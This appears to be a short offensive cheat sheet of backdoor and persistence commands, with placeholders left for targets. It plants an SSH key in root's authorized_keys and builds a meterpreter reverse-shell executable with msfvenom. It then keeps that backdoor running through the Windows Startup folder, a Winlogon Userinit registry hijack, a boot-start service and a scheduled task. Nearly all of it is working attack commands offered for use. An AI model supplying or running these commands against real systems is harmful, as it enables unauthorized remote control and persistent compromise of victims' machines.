ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub | tr -d '\n' | xclip -sel clip

cd /root/.ssh
nano authorized_keys

msfvenom -p windows/meterpreter/reverse_tcp <LHOST> <LPORT> -f exe > backdoor.exe

# Startup folder location
C:\Users%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. %username%

# When a user logs in Userinit.exe will be executed and then our backdoor.
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, <path-to-backdoor>" /f

powershell_shell
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

powershell_shell
$Action = New-ScheduledTaskAction -Execute 'pwsh.exe' -Argument '-NonInteractive -NoLogo -NoProfile -File "pat-to-backdoor"'
$Trigger = New-ScheduledTaskTrigger -Once -At 3am
$Settings = New-ScheduledTaskSettingsSet
$Task = New-ScheduledTask -Action $Action -Trigger $Trigger -Settings $Settings
Register-ScheduledTask -TaskName 'task-name' -InputObject $Task -User 'username' -Password 'pass'